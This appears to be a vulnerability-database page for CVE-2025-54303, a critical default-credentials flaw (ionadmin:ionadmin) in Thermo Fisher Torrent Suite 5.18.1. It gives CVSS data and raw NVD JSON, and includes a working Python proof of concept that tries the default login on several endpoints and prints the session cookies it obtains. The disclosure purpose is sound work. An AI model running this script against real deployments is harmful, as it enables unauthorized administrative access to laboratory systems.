Security Vulnerability Report
中文
CVE-2025-54303 CVSS 9.8 CRITICAL

CVE-2025-54303

Published: 2025-12-04 15:15:59
Last Modified: 2025-12-16 21:00:14
Source: [email protected]

Description

The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thermofisher:torrent_suite_software:5.18.1:*:*:*:*:*:*:* - VULNERABLE
Thermo Fisher Torrent Suite Django application <= 5.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-54303 PoC - Thermo Fisher Torrent Suite Default Credentials # Target: Thermo Fisher Torrent Suite Django application <= 5.18.1 # Vulnerability: Default credentials (ionadmin:ionadmin) def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-54303. Attempts to authenticate with default ionadmin credentials. """ # Normalize URL if not target_url.startswith('http'): target_url = 'https://' + target_url if target_url.endswith('/'): target_url = target_url[:-1] # Default credentials username = 'ionadmin' password = 'ionadmin' # Try authentication via common Torrent Suite login endpoints login_endpoints = [ '/api/v1/auth/login', '/auth/login/', '/admin/login/', '/login/', '/', ] print(f'[*] Target: {target_url}') print(f'[*] Attempting default credentials: {username}:{password}') for endpoint in login_endpoints: url = target_url + endpoint try: # Try form-based login response = requests.post( url, data={'username': username, 'password': password}, timeout=10, verify=False, allow_redirects=True ) # Check for successful login indicators if response.status_code in [200, 302] and any(indicator in response.text.lower() for indicator in ['admin', 'dashboard', 'torrent', 'logout', 'session']): print(f'[+] VULNERABLE! Authenticated successfully via {endpoint}') print(f'[+] Status code: {response.status_code}') print(f'[+] Session/Cookie: {response.cookies.get_dict()}') return True except requests.exceptions.RequestException as e: print(f'[-] Error accessing {endpoint}: {e}') continue print('[-] Could not authenticate with default credentials.') print('[-] Target may not be vulnerable or may use different login mechanism.') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve_2025_54303_poc.py <target_url>') print('Example: python cve_2025_54303_poc.py https://torrent-suite.example.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54303", "sourceIdentifier": "[email protected]", "published": "2025-12-04T15:15:58.633", "lastModified": "2025-12-16T21:00:13.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1392"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thermofisher:torrent_suite_software:5.18.1:*:*:*:*:*:*:*", "matchCriteriaId": "C9D40EC2-7E68-4166-9ECF-431E4294CB97"}]}]}], "references": [{"url": "https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.